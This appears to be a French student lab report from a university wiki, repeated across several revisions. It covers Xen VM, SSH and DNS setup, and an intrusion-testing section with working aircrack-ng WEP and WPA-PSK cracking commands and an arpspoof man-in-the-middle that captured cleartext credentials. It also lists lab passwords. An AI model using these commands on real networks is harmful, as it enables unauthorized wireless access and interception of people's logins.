iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55107TP sysres IMA5sc 2020/2021 G92020-12-21T16:29:31Z<p>Pvernier : /* Cassage de mot de passe WPA-PSK par force brute */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
[[Fichier:Crack_resultat_WPA.PNG|center]]<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
(à remplir)<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55106TP sysres IMA5sc 2020/2021 G92020-12-21T16:27:49Z<p>Pvernier : /* Cassage de clef WEP d'un point d'accés Wifi */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
[[Fichier:Capture-wep-encrypt.PNG|center]]<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
(à remplir)<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55105TP sysres IMA5sc 2020/2021 G92020-12-21T16:10:57Z<p>Pvernier : /* Tests d'intrusion */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
(à remplir)<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
vif = [ 'bridge=IMA5sc, ip=100.64.0.20, mac=00:16:3E:DC:81:A8', 'bridge=bridgeStudents, ip=192.168.42.9 ,mac=00:16:3E:DC:81:A9' ]<br />
<br />
Ensuite, on relance la VM et on modifie le fichier dans /etc/network/interfaces pour y ajouter l'interface réseau eth1 avec la bonne adresse IP<br />
<br />
auto eth1<br />
iface eth1 inet static<br />
address 192.168.42.9<br />
netmask 255.255.255.0<br />
<br />
Pour finir on réalise une masquarade à l'aide de la commande iptables<br />
<br />
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT --to-source 193.48.57.180 -s 192.168.42.23<br />
<br />
===Ansible===<br />
<br />
Premièrement, on installe ansible sur notre VM sur capbreton<br />
<br />
apt install ansible<br />
<br />
Ensuite, on génère les clefs ssh avec la commande<br />
<br />
ssh-keygen -t rsa<br />
<br />
Puis, on installe la clef publique sur les Vms cibles<br />
<br />
cat .ssh/id_rsa.pub | ssh root@192.168.42.9 "cat >> /root/.ssh/authorized_keys2" (installation sur notre VM chassiron)</div>Pvernierhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G9&diff=55104TP sysres IMA5sc 2020/2021 G92020-12-21T16:10:44Z<p>Pvernier : /* Tests d'intrusion */</p>
<hr />
<div> <br />
==Création de la VM==<br />
<br />
root@capbreton:~# xen-create-image --hostname=Calicedelamort --ip=100.64.0.20 --netmask=255.255.255.240 --password=pasglop --dir=/usr/local/xen --dist=buster --gateway=100.64.0.5<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy1<br />
LV Name PaulTanguy1<br />
VG Name storage<br />
LV UUID Mk2sRM-HJvO-Ul2V-7z4A-WYDR-w2Rs-woO4FD<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:07 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:24<br />
<br />
--- Logical volume ---<br />
LV Path /dev/storage/PaulTanguy2<br />
LV Name PaulTanguy2<br />
VG Name storage<br />
LV UUID zWVz4u-2u2T-Fd1T-7W5X-G4Fg-M8dO-bEwuEt<br />
LV Write Access read/write<br />
LV Creation host, time capbreton, 2020-10-12 17:02:11 +0100<br />
LV Status available<br />
# open 0<br />
LV Size 10.00 GiB<br />
Current LE 2560<br />
Segments 1<br />
Allocation inherit<br />
Read ahead sectors auto<br />
- currently set to 256<br />
Block device 254:25<br />
<br />
==Services Internet==<br />
<br />
===Serveur SSH===<br />
<br />
On installe simplement un serveur SSH sur la VM.<br />
On modifie le fichier /etc/ssh/sshd_config pour autoriser la connexion en tant que root.<br />
On peut s'y connecter à distance avec la commande suivante :<br />
<br />
ssh root@ns1.calicedelamort.site<br />
<br />
(avec le même mot de passe (pifou) que les machines de TPs)<br />
<br />
===Serveur DNS===<br />
<br />
Dans un premier temps, on loue un nom de domaine sur gandi.net.<br />
Notre nom de domaine est calicedelamort.site<br />
<br />
Ensuite, on installe sur la VM, le paquetage bind9<br />
<br />
Une fois ce paquetage installé, on modifie les fichiers de configuration.<br />
<br />
Dans /etc/bind/db.calicedelamort.site<br />
<br />
;BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.calicedelamort.site. postmaster.calicedelamort.site. (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.calicedelamort.site.<br />
@ IN NS ns6.gandi.net.<br />
@ IN MX 100 ns1<br />
ns1 IN A 193.48.57.180<br />
<br />
Ensuite, dans /etc/bind/named.conf.local<br />
<br />
zone "calicedelamort.site" IN {<br />
type master;<br />
file "/etc/bind/db.calicedelamort.site";<br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
<br />
Et enfin, dans /etc/bind/name.conf.options :<br />
<br />
options {<br />
directory "/var/cache/bind";<br />
dnssec-enable yes;<br />
dnssec-validation auto;<br />
listen-on-v6 { any; };<br />
allow-recursion { localhost; };<br />
};<br />
<br />
Pour finir, on se rend sur gandi.net et dans l'option Gluerecords on lie ns1.calicedelamort.site à l'adresse 193.48.57.180.<br />
Puis, on ajoute dans serveurs de noms externes :<br />
<br />
ns1.calicedelamort.site<br />
ns6.gandi.net<br />
<br />
==Tests d'intrusion== <br />
<br />
===Cassage de clef WEP d'un point d'accés Wifi===<br />
<br />
En premier lieu, on installe le paquetage aircrack-ng sur un PC.<br />
<br />
Ensuite, on utilise les commandes suivantes : <br />
<br />
airmon-ng<br />
Cette commande permet d'afficher les interfaces réseau<br />
<br />
[[Fichier:Airmong.PNG|thumb|center]]<br />
<br />
airmon-ng start <interface><br />
Pour passer l'interface en mode monitor<br />
<br />
airodump-ng --encrypt wep 'nomInterface'<br />
Pour afficher les réseaux wifi WEP<br />
<br />
airodump-ng --write 'nomFichier' --channel 3 -bssid '@mac_AP' 'nomInterface'<br />
Pour capturer les paquets émis par le point d'accés ciblé<br />
<br />
aircrack-ng -x 'nomFichier'-01.cap<br />
Pour cracker la clef WEP (à condition d'avoir capturé assez de paquets)<br />
<br />
===Cassage de mot de passe WPA-PSK par force brute===<br />
<br />
Pour cette partie, nous utilisons aussi le paquetage aircrack-ng.<br />
<br />
On utilise les mêmes commandes que précédemment pour trouver les réseaux wifi utilisant WPA-PSK<br />
<br />
airodump-ng --encrypt wpa-psk 'nomInterface'<br />
<br />
airodump-ng --write 'nomFichier' --bssid '@mac_AP' -c 'numChannel' 'nomInterface'<br />
<br />
Une fois que l'on obtient le handshake de point d'accés, on peut essayer de cracker la clef WPA-PSK à l'aide de la commande aircrack-ng<br />
<br />
Cependant, il faut créer un dictionnaire de clef, dans le sujet, nous savons que la clef est composée de 8 chiffres, on crée donc un dictionnaire constitué de toutes les clef à 8 chiffres possible<br />
Pour cela, on utilisa la commande :<br />
crunch 8 8 0123456789 > 'nomDuDico.txt'<br />
<br />
Maintenant, on peut essayer de cracker la clef à l'aide du dictionnaire :<br />
<br />
aircrack-ng -a 2 -w 'nomDuDico.txt' 'nomFichier'-01.cap<br />
<br />
Au bout d'un certain temps, on obtient la clef WPA-PSK permettant de se connecter au point d'accés Wifi.<br />
<br />
===Man In The Middle===<br />
(Homme du milieu en anglais)<br />
<br />
D'abord, sur le eeePC, on modifie le fichier /proc/sys/net/ipv4/ip_forward :<br />
<br />
echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Ensuite on utilise la commande du paquet dsniff :<br />
<br />
arpspoof -i eth0 -t 172.26.145.254 172.26.145.58<br />
arpspoof -i eth0 -t 172.26.145.58 172.26.145.254<br />
<br />
Enfin, on utilise wireshark pour observer les paquets.<br />
Pour tester l'attaque MiTM, nous avons essayer de nous connecter à un site utilisant un protocole http.<br />
<br />
Sur wireshark, nous avons pu voir, en clair, les identifiants de connexion ainsi que le mot de passe saisi par l'utilisateur.<br />
<br />
(photo)<br />
<br />
===Intrusion sur un serveur d'application Web===<br />
(à remplir)<br />
<br />
==TP ASR==<br />
<br />
===Ajout d'une seconde interface réseau sur la VM===<br />
<br />
On se connecte sur capbreton<br />
ssh root@capbreton<br />
<br />
Et on modifie le fichier de configuration de notre VM (Calicedelamort.cfg) en y ajoutant une deuxième interfaces dans la ligne 'vif'<br />
<br />
nano /etc/xen/Calicedelamort.cfg<br />
<br />
